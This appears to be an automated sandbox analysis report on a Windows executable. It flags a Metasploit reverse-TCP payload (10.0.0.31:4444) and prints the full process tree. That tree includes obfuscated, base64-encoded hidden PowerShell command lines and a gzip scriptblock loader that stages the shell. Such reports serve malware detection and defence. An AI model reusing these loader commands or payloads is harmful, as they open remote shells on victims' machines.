Analysis
-
max time kernel
129s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
21/01/2024, 23:22
Static task
static1
Behavioral task
behavioral1
Sample
6e1a88382a9a78105094ed412b1a9038.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6e1a88382a9a78105094ed412b1a9038.exe
Resource
win10v2004-20231215-en
General
-
Target
6e1a88382a9a78105094ed412b1a9038.exe
-
Size
297KB
-
MD5
6e1a88382a9a78105094ed412b1a9038
-
SHA1
5ec88111ba9f5c96e5943a0f0d7ea169c3de97f3
-
SHA256
64dac5ded715c47d9e36381bc87e6205ad02ffbab5b4f516a6bc91bb08fb4b68
-
SHA512
72a01c0733a6b268953c538a23603c9a3710d72ba065c66d512738b73b688f61155ba78e2929e63aa82363c1d0b2bf6bcbf3d74ae78efe29cecab954dea395ea
-
SSDEEP
6144:+9Ckr91bn+UdW5oPGNZuaReIn1mN/YaINny:+ZbnHx8uaR7nEKNy
Malware Config
Extracted
metasploit
windows/reverse_tcp
10.0.0.31:4444
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 968 powershell.exe 968 powershell.exe 2780 powershell.exe 2780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1996 wrote to memory of 4316 1996 6e1a88382a9a78105094ed412b1a9038.exe 89 PID 1996 wrote to memory of 4316 1996 6e1a88382a9a78105094ed412b1a9038.exe 89 PID 1996 wrote to memory of 4316 1996 6e1a88382a9a78105094ed412b1a9038.exe 89 PID 4316 wrote to memory of 968 4316 cmd.exe 90 PID 4316 wrote to memory of 968 4316 cmd.exe 90 PID 4316 wrote to memory of 968 4316 cmd.exe 90 PID 968 wrote to memory of 2780 968 powershell.exe 93 PID 968 wrote to memory of 2780 968 powershell.exe 93 PID 968 wrote to memory of 2780 968 powershell.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /b /min p^o^wer^sh^ell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBGAFgAbABCADIARQBDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA2AEIAagA4AHUAYQBTAEoAVgB1AGcAVwBNADcAUwBSADIALwBJAGoAZgB0AGEAbwBOAHIARwBIAGoAaABYAFYAZwBzAFUATgA2AC8AZAA5AHYAcwBFADIAYQBxAHUAbABkAGUAOQBJAGgAUAAvAFkAeABNAHoAdgB6AHoAVABlAHoATABKAFAAUQBFAFoAUwBIADAAbgAyAEwAUwBWADkATwBqAG8AKwA2AE8ATQBLAEIAcABCAFQAOAB5AG4ATgBSAEsAcABDAHIAaQAwADIAZwBIAGgAMwBCAFIAaQBFACsANgA1AHgASgBIAHkAVgBsAGoAdABaAHIAaQB3AGUAWQBoAG8AdgBMAFMAegBPAEoASQBoAEsASwAvAGIAegBVAEkAQQBMAEYATQBRAG4AdQBHAFMAVwB4AG8AawBwAC8AUwBXAE8AZgBSAE8AVAAwADkAdgA2AEIATwBFAEwANgBJAGgAVQArAGwAeABxAE0AMwAyAE4AMgBFAEUAdABOADcAUABoAEUATwBrAFcAaABtACsAMwBkAGMAQQBkAG4AMwBwAFEARwBhADAAYQBGAEkAbgAvADYASgBLAHYAegAwAC8ASwBpAFYASAA5AE0ATQBJAHMAVgBlAFoARABHAGcAZwBRAGwAbAB6AEYAWgBsAGIANgBxADIAWQBGADMANgBaAG8AbwBjAHAAcwA2AEUAWQAvADUAVQBwAFQARwBOAEsAeABXAFMAcwBNAHcAeABrAHYAUwBBAFcAcwBiADAAaQBiAEMANQAyADQAcwBxAHgAQQBGAGYAQwBJAGkAawBpAGkAVQBkAHYARgBrAEIAdgBiAGIAaQBnAHoARABiAHMAUQBkADUATABvAFIAaQBXAE8ANQBLAE0AMAB6ADAALwBQAEYANABrADkAbABmAGoAaQAzAG4ANABTAEMAQgBxAFQAVQBDAGcAVwBKACsASABwAEEAbwBnADEAMQBTAEYAeABxADQAdABCAGwAcABFACsAVwBDADkAQQBhAGkASQBpAEcAMwBrAEoAVgBRAFcAegBEAFYAMABRAHAAaABBAGwAagBSAGUAbAAzAHoAQwBnAGQAcwBzADEAUgArADEAVQBsADUAYgBVAFMAUwBIAFYARgBwAEIAWQBoAGsAMgAvAEUAMgBlAFoAdQB3AHMAaABlAFUAMwA3AEQAMABTAHoANwBLAGoAdwB2AEQAQQBEAG8AdgBwADQAYwBuAHgAdwB2AGMANwBxAGsAbgAvAHMAUAByAC8AawBDAG8ANgBQADUAYgBrAHoAQQBQAGEAWABMAFkANwBxAFQAKwB5AGoAcABSAGEAawBOAEIAMgBIAEIAbwB4AFMAbQBoAGIAcwBvAEkAZQByAGkAQgBWAHkAcAA4AEcAZwBWAGYANgA1AGQAegBrAFYAQgBNAE8AMQBIAHMARABJAGYAYwBlAG8AdQBRAE8ATwBRAHoAbwBLAC8AeQBsAFoALwBUAGsAcQBMAEwARwBsAEkAcgBEAFQARQBBAFgAVgB5ADMAaQBsAHYASQBVAHkAVwBqAE8AegBDAEsAKwBWAGkASABmAEIASQBrAFEAOABiAHgATABVAEkASQB4ADQAVwBHAFcAWgBaAG8AbgA5AFEAcQB3AGQAVQB2AE8AZwBhAEMAVwBVAHUAaQBaAEEARABXAFkAcgBCAEsAMABpAGcAKwByADAAegArAHoAUQBvAGMAaQB0AHMAawB3AEQAZwAyAGMAKwBCAGUAWQBVAGwAcwBKADMAawAwAGcAZQBHAHAALwBuAHAAMgBSAHkARQBaAEoAUABoAE8AQwA1AEsAMwBRAFQASwB6AFMAbABLAEEANABJAFoAYwBZAHMAUwBDAG0ATgA2ADIARQBLAEoANABMAHUAaAAvAE0AMwBkAGQAcwBJAEUAZABYAEEAcwBjAG4ATQBMAGQAWQAvAGkANABUAFMAVABoADcARwBJAEUAZwBmAHkAQgBaAEgAZgBEAGQAYgBFAG8AWgBoAGwAUQBCAFMAbABKAG4AVwBKAGsAUQA2AG8AbAA1ADgAcQB2AHcAbQBEAGkAUgBtAEQARQBnAEIATABHADAAZwBEAHIARwBUAGgARAAwAFQARwBnAGcAZwBjAGgASQB5AHIAcABRAEUAUgByAFcARABOAFMAQQBBAFMAdQA1AHEAMwBHAGYAYQBnAHcAZwA4ADAAMwA1AEUARwBlADgAUwBWAHYALwBjAHUASgAvAEcAZQBzAFIAawBLAGUAZgBpAHYAZgBJAFAAVQBEAGgAZwBYAFIAVwBsAEUASQB3AEcATgBJADAATQBVAHkAUABOAGYAVABuADcAVgBMADgAQQBIAE0AeQBJAEgALwBKAFcAOABJAHUAWgBHAEsAagBJAGUARgAwAEsAZQAwAGYAQQBBAHgAaQA3ADAAUwBFAEQAWQBkAHMAUQBEAEEAOABmAGsAcgBMAGIAdgBDADgAbwA3ADcAWgBaADIARQBUAHoAVABWAHMAagBhADcAdABXAEsAbABsAHQAYgArAEwAYgBoAE8ANwBUAE8AMwBlAHUAcgBoADYAWgBHAHEAeQAzAGUAZABzAHkANAAyADcAQQAvAEkATAByADEAdABzADYASABEAG4ATABjAEsANQBkAGMARABFAFkAMQBNAGEAaQAzAGgATgBsAEYAegBSADcAVgBqAFoAcgB2AEcAUAByAGQAYgB1AHgATgBoAHkAMAB4AGIAYQBIAG0AbgBlADgAdwB2AFYAdABmAFAAVwBtADEAVwBLAGYAYgA1AHIAagB0AFcATQBiAHoAdABoAEkARABHAFcAdQAxADUAawBSAEgAMQBXAHIAdAB0AHEAcQB2AEEATABJAHAATABYAHMAcgA1AEgAWQBDAHUAbgAyADYAZwBUAEUAMAB3AE4AcwBiAG8AeABVAGIAZQBvAHYAVgByADgAegArAC8AYgBoAGkAegA4AGEAcwBxAGQAVgBzAGYAegBuAG0AOABlAEIAcwBhAG0AbQBhAGQAdQBGAGkAcQA1ADAAaQBaAEgAQwAzADIAawA0AG4ANQBUADYALwBhAHoAcQBCAFUAUQB1ADUAZABtAEgAVwBWAHEAaQBPAGsAQgBuAFcAUgA3AGIAQgByADYAZABHAGgATAByAGEAQwBIAHQAcgBiAG4AbwBJAE4AUwB1AGUAaQBRAHoAYgBvAFcAVABXAEcAOQBwAEcAcgAyAGMAYgBhAE4AaAA0AGUATABRAHUATgBFACsANwBHAEUAKwB3AGIANAB4AEgARgBUAHAAYgBUAC8AbwArAHoATwAxAHQAcwAzAGUAdAA2AGIAVwBXAFMANQA3ADUAYgBBAHYAQQBOAFQAagBDAFgAaAA5AGsAUABMAFAAaQArAEUAdQBRAHMAZAA0AGoANAAzADIASAB4AHgAVwA4AE0AagBnAHkAUQBNAGEAZQBQAGEASwBHAFAAMQAzAGIAWABRAGIANwBkADgATQBLAFIAeQBQAFcAbQBXAEIAMABNADAAdAB0AFQAUwB0AFAAdQB6AFgAVQAxAFAAbQA0ADQAYQBFAGUAaQBHAFAAUAA2AEcARQBVAGIANgB4AG4AUwB5AHUAUABYAE8ANgBPAC8AKwBoAE0AbAA5AHAAbwB3AHMANAAxAHkAKwB4ADEALwBVAGsAVwBzADcAWQBPAHMAdAA5AHQAMAA3AHAAMgBaAHUAVwB0AGMAMwB2ACsANABXAFoATQBSAHcARgBIAFEAMAAwAGIAdgBjAHYANABBAG8AUQBwAFAASQBTAHYAbQBQAEMAegB0AHQAMwBHAFUAZQB4AGoAQgBnAHkAQgBmAHAAeQBYAG8AcwAwAGoAKwA5AEIAaAB1ADUAeABtAEcAbwBxAFMAWABjAHcAcgBFAG8AVwBFAHcAYgBVAEcARgAxADkATwBhAHMAUQBZAGQANwBJAEcAdgAyAHYARgBjAEwAbgBzAFcAMwA1ADIAQQB3ADEAaABXAEsAMgA4AE8AVgBLAGwARgAwAEgAMQBXACsAUABQAGwAeQA0AHYAWgArAEEAawAxAEUAbgBJAFMAegBjAGsAOQBJAFIAZgAxAEoAKwBxAHUAZwA0ADkAWABIACsAcQA2AFIARABnAHIANABkAGwAOABuAFUASwBOAHcAcABZAEEAMgAzAEEAWgBHACsAVgA3AGEAeQBxAFcAZQBVAFUATgB1AGgALwB4AGUAbABRAHIARAA3ADgAdQBmACsARwAwADcAZQAxAGYAOQBqADkASgBlAHoAMABZAGgAYgByAEQANAB2AGYATAAvAHcAVwBrAEwAOABiADkAeABoAFQAQQBZAEkARABhAEQAYQBNADcARwArADQAdAA4AE0ALwBNAE8ATABWAC8AYgA5AEIAawBPAC8AbAA0AGMAbABlADMAMgA0AFQAYwBkAHEAQgBsADQASwBUADQANwA4AEIALwBiAGYAQwBaAFMAawBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBGAFgAbABCADIARQBDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA2AEIAagA4AHUAYQBTAEoAVgB1AGcAVwBNADcAUwBSADIALwBJAGoAZgB0AGEAbwBOAHIARwBIAGoAaABYAFYAZwBzAFUATgA2AC8AZAA5AHYAcwBFADIAYQBxAHUAbABkAGUAOQBJAGgAUAAvAFkAeABNAHoAdgB6AHoAVABlAHoATABKAFAAUQBFAFoAUwBIADAAbgAyAEwAUwBWADkATwBqAG8AKwA2AE8ATQBLAEIAcABCAFQAOAB5AG4ATgBSAEsAcABDAHIAaQAwADIAZwBIAGgAMwBCAFIAaQBFACsANgA1AHgASgBIAHkAVgBsAGoAdABaAHIAaQB3AGUAWQBoAG8AdgBMAFMAegBPAEoASQBoAEsASwAvAGIAegBVAEkAQQBMAEYATQBRAG4AdQBHAFMAVwB4AG8AawBwAC8AUwBXAE8AZgBSAE8AVAAwADkAdgA2AEIATwBFAEwANgBJAGgAVQArAGwAeABxAE0AMwAyAE4AMgBFAEUAdABOADcAUABoAEUATwBrAFcAaABtACsAMwBkAGMAQQBkAG4AMwBwAFEARwBhADAAYQBGAEkAbgAvADYASgBLAHYAegAwAC8ASwBpAFYASAA5AE0ATQBJAHMAVgBlAFoARABHAGcAZwBRAGwAbAB6AEYAWgBsAGIANgBxADIAWQBGADMANgBaAG8AbwBjAHAAcwA2AEUAWQAvADUAVQBwAFQARwBOAEsAeABXAFMAcwBNAHcAeABrAHYAUwBBAFcAcwBiADAAaQBiAEMANQAyADQAcwBxAHgAQQBGAGYAQwBJAGkAawBpAGkAVQBkAHYARgBrAEIAdgBiAGIAaQBnAHoARABiAHMAUQBkADUATABvAFIAaQBXAE8ANQBLAE0AMAB6ADAALwBQAEYANABrADkAbABmAGoAaQAzAG4ANABTAEMAQgBxAFQAVQBDAGcAVwBKACsASABwAEEAbwBnADEAMQBTAEYAeABxADQAdABCAGwAcABFACsAVwBDADkAQQBhAGkASQBpAEcAMwBrAEoAVgBRAFcAegBEAFYAMABRAHAAaABBAGwAagBSAGUAbAAzAHoAQwBnAGQAcwBzADEAUgArADEAVQBsADUAYgBVAFMAUwBIAFYARgBwAEIAWQBoAGsAMgAvAEUAMgBlAFoAdQB3AHMAaABlAFUAMwA3AEQAMABTAHoANwBLAGoAdwB2AEQAQQBEAG8AdgBwADQAYwBuAHgAdwB2AGMANwBxAGsAbgAvAHMAUAByAC8AawBDAG8ANgBQADUAYgBrAHoAQQBQAGEAWABMAFkANwBxAFQAKwB5AGoAcABSAGEAawBOAEIAMgBIAEIAbwB4AFMAbQBoAGIAcwBvAEkAZQByAGkAQgBWAHkAcAA4AEcAZwBWAGYANgA1AGQAegBrAFYAQgBNAE8AMQBIAHMARABJAGYAYwBlAG8AdQBRAE8ATwBRAHoAbwBLAC8AeQBsAFoALwBUAGsAcQBMAEwARwBsAEkAcgBEAFQARQBBAFgAVgB5ADMAaQBsAHYASQBVAHkAVwBqAE8AegBDAEsAKwBWAGkASABmAEIASQBrAFEAOABiAHgATABVAEkASQB4ADQAVwBHAFcAWgBaAG8AbgA5AFEAcQB3AGQAVQB2AE8AZwBhAEMAVwBVAHUAaQBaAEEARABXAFkAcgBCAEsAMABpAGcAKwByADAAegArAHoAUQBvAGMAaQB0AHMAawB3AEQAZwAyAGMAKwBCAGUAWQBVAGwAcwBKADMAawAwAGcAZQBHAHAALwBuAHAAMgBSAHkARQBaAEoAUABoAE8AQwA1AEsAMwBRAFQASwB6AFMAbABLAEEANABJAFoAYwBZAHMAUwBDAG0ATgA2ADIARQBLAEoANABMAHUAaAAvAE0AMwBkAGQAcwBJAEUAZABYAEEAcwBjAG4ATQBMAGQAWQAvAGkANABUAFMAVABoADcARwBJAEUAZwBmAHkAQgBaAEgAZgBEAGQAYgBFAG8AWgBoAGwAUQBCAFMAbABKAG4AVwBKAGsAUQA2AG8AbAA1ADgAcQB2AHcAbQBEAGkAUgBtAEQARQBnAEIATABHADAAZwBEAHIARwBUAGgARAAwAFQARwBnAGcAZwBjAGgASQB5AHIAcABRAEUAUgByAFcARABOAFMAQQBBAFMAdQA1AHEAMwBHAGYAYQBnAHcAZwA4ADAAMwA1AEUARwBlADgAUwBWAHYALwBjAHUASgAvAEcAZQBzAFIAawBLAGUAZgBpAHYAZgBJAFAAVQBEAGgAZwBYAFIAVwBsAEUASQB3AEcATgBJADAATQBVAHkAUABOAGYAVABuADcAVgBMADgAQQBIAE0AeQBJAEgALwBKAFcAOABJAHUAWgBHAEsAagBJAGUARgAwAEsAZQAwAGYAQQBBAHgAaQA3ADAAUwBFAEQAWQBkAHMAUQBEAEEAOABmAGsAcgBMAGIAdgBDADgAbwA3ADcAWgBaADIARQBUAHoAVABWAHMAagBhADcAdABXAEsAbABsAHQAYgArAEwAYgBoAE8ANwBUAE8AMwBlAHUAcgBoADYAWgBHAHEAeQAzAGUAZABzAHkANAAyADcAQQAvAEkATAByADEAdABzADYASABEAG4ATABjAEsANQBkAGMARABFAFkAMQBNAGEAaQAzAGgATgBsAEYAegBSADcAVgBqAFoAcgB2AEcAUAByAGQAYgB1AHgATgBoAHkAMAB4AGIAYQBIAG0AbgBlADgAdwB2AFYAdABmAFAAVwBtADEAVwBLAGYAYgA1AHIAagB0AFcATQBiAHoAdABoAEkARABHAFcAdQAxADUAawBSAEgAMQBXAHIAdAB0AHEAcQB2AEEATABJAHAATABYAHMAcgA1AEgAWQBDAHUAbgAyADYAZwBUAEUAMAB3AE4AcwBiAG8AeABVAGIAZQBvAHYAVgByADgAegArAC8AYgBoAGkAegA4AGEAcwBxAGQAVgBzAGYAegBuAG0AOABlAEIAcwBhAG0AbQBhAGQAdQBGAGkAcQA1ADAAaQBaAEgAQwAzADIAawA0AG4ANQBUADYALwBhAHoAcQBCAFUAUQB1ADUAZABtAEgAVwBWAHEAaQBPAGsAQgBuAFcAUgA3AGIAQgByADYAZABHAGgATAByAGEAQwBIAHQAcgBiAG4AbwBJAE4AUwB1AGUAaQBRAHoAYgBvAFcAVABXAEcAOQBwAEcAcgAyAGMAYgBhAE4AaAA0AGUATABRAHUATgBFACsANwBHAEUAKwB3AGIANAB4AEgARgBUAHAAYgBUAC8AbwArAHoATwAxAHQAcwAzAGUAdAA2AGIAVwBXAFMANQA3ADUAYgBBAHYAQQBOAFQAagBDAFgAaAA5AGsAUABMAFAAaQArAEUAdQBRAHMAZAA0AGoANAAzADIASAB4AHgAVwA4AE0AagBnAHkAUQBNAGEAZQBQAGEASwBHAFAAMQAzAGIAWABRAGIANwBkADgATQBLAFIAeQBQAFcAbQBXAEIAMABNADAAdAB0AFQAUwB0AFAAdQB6AFgAVQAxAFAAbQA0ADQAYQBFAGUAaQBHAFAAUAA2AEcARQBVAGIANgB4AG4AUwB5AHUAUABYAE8ANgBPAC8AKwBoAE0AbAA5AHAAbwB3AHMANAAxAHkAKwB4ADEALwBVAGsAVwBzADcAWQBPAHMAdAA5AHQAMAA3AHAAMgBaAHUAVwB0AGMAMwB2ACsANABXAFoATQBSAHcARgBIAFEAMAAwAGIAdgBjAHYANABBAG8AUQBwAFAASQBTAHYAbQBQAEMAegB0AHQAMwBHAFUAZQB4AGoAQgBnAHkAQgBmAHAAeQBYAG8AcwAwAGoAKwA5AEIAaAB1ADUAeABtAEcAbwBxAFMAWABjAHcAcgBFAG8AVwBFAHcAYgBVAEcARgAxADkATwBhAHMAUQBZAGQANwBJAEcAdgAyAHYARgBjAEwAbgBzAFcAMwA1ADIAQQB3ADEAaABXAEsAMgA4AE8AVgBLAGwARgAwAEgAMQBXACsAUABQAGwAeQA0AHYAWgArAEEAawAxAEUAbgBJAFMAegBjAGsAOQBJAFIAZgAxAEoAKwBxAHUAZwA0ADkAWABIACsAcQA2AFIARABnAHIANABkAGwAOABuAFUASwBOAHcAcABZAEEAMgAzAEEAWgBHACsAVgA3AGEAeQBxAFcAZQBVAFUATgB1AGgALwB4AGUAbABRAHIARAA3ADgAdQBmACsARwAwADcAZQAxAGYAOQBqADkASgBlAHoAMABZAGgAYgByAEQANAB2AGYATAAvAHcAVwBrAEwAOABiADkAeABoAFQAQQBZAEkARABhAEQAYQBNADcARwArADQAdAA4AE0ALwBNAE8ATABWAC8AYgA5AEIAawBPAC8AbAA0AGMAbABlADMAMgA0AFQAYwBkAHEAQgBsADQASwBUADQANwA4AEIALwBiAGYAQwBaAFMAawBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAFXlB2ECA7VW+2+bSBD+OZHyP6DKEqA6Bj8uaSJVugWM7SR2/IjftaoNrGHjhXVgsUN6/d9vsE2aqulde9IhP/YxMzvzzTezLJPQEZSH0n2LSV9Ojo+6OMKBpBT8ynNRKpCri02gHh3BRiE+65xJHyVljtZriweYhovLSzOJIhKK/bzUIALFMQnuGSWxokp/SWOfROT09v6BOEL6IhU+lxqM32N2EEtN7PhEOkWhm+3dcAdn3pQGa0aFIn/6JKvz0/KiVH9MMIsVeZDGggQllzFZlb6q2YF36Zoocps6EY/5UpTGNKxWSsMwxkvSAWsb0ibC524sqxAFfCIikiiUdvFkBvbbigzDbsQd5LoRiWO5KM0z0/PF4k9lfji3n4SCBqTUCgWJ+HpAog11SFxq4tBlpE+WC9AaiIiG3kJVQWzDV0QphAljRel3zCgdss1R+1Ul5bUSSHVFpBYhk2/E2eZuwsheU37D0Sz7KjwvDADovp4cnxwvc7qkn/sPr/kCo6P5bkzAPaXLY7qT+yjpRakNB2HBoxSmhbsoIeriBVyp8GgVf65dzkVBMO1HsDIfceouQOOQzoK/ylZ/TkqLLGlIrDTEAXVy3ilvIUyWjOzCK+ViHfBIkQ8bxLUIIx4WGWZZon9QqwdUvOgaCWUuiZADWYrBK0ig+r0z+zQocitskwDg2c+BeYUlsJ3k0geGp/np2RyEZJPhOC5K3QTKzSlKA4IZcYsSCmN62EKJ4Luh/M3ddsIEdXAscnMLdY/i4TSTh7GIEgfyBZHfDdbEoZhlQBSlJnWJkQ6ol58qvwmDiRmDEgBLG0gDrGThD0TGgggchIyrpQERrWDNSAASu5q3Gfagwg8035EGe8SVv/cuJ/GesRkKefivfIPUDhgXRWlEIwGNI0MUyPNfTn7VL8AHMyIH/JW8IuZGKjIeF0Ke0fAAxi70SEDYdsQDA8fkrLbvC8o77ZZ2ETzTVsja7tWKlltb+LbhO7TO3eurh6ZGqy3edsy427A/ILr1ts6HDnLcK5dcDEY1Mai3hNlFzR7VjZrvGPrdbuxNhy0xbaHmne8wvVtfPWm1WKfb5rjtWMbzthIDGWu15kRH1WrttqqvALIpLXsr5HYCun26gTE0wNsboxUbeovVr8z+/bhiz8asqdVsfznm8eBsammaduFiq50iZHC32k4n5T6/azqBUQu5dmHWVqiOkBnWR7bBr6dGhLraCHtrbnoINSueiQzboWTWG9pGr2cbaNh4eLQuNE+7GE+wb4xHFTpbT/o+zO1ts3et6bWWS575bAvANTjCXh9kPLPi+EuQsd4j432HxxW8MjgyQMaePaKGP13bXQb7d8MKRyPWmWB0M0ttTStPuzXU1Pm44aEeiGPP6GEUb6xnSyuPXO6O/+hMl9pows41y+x1/UkWs7YOst9t07p2ZuWtc3v+4WZMRwFHQ00bvcv4AoQpPISvmPCztt3GUexjBgyBfpyXos0j+9Bhu5xmGoqSXcwrEoWEwbUGF19OasQYd7IGv2vFcLnsW352Aw1hWK28OVKlF0H1W+PPly4vZ+Ak1EnISzck9IRf1J+qug49XH+q6RDgr4dl8nUKNwpYA23AZG+V7ayqWeUUNuh/xelQrD78uf+G07e1f9j9Jez0YhbrD4vfL/wWkL8b9xhTAYIDaDaM7G+4t8M/MOLV/b9BkO/l4cle324TcdqBl4KT478B/bfCZSkKAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
Network
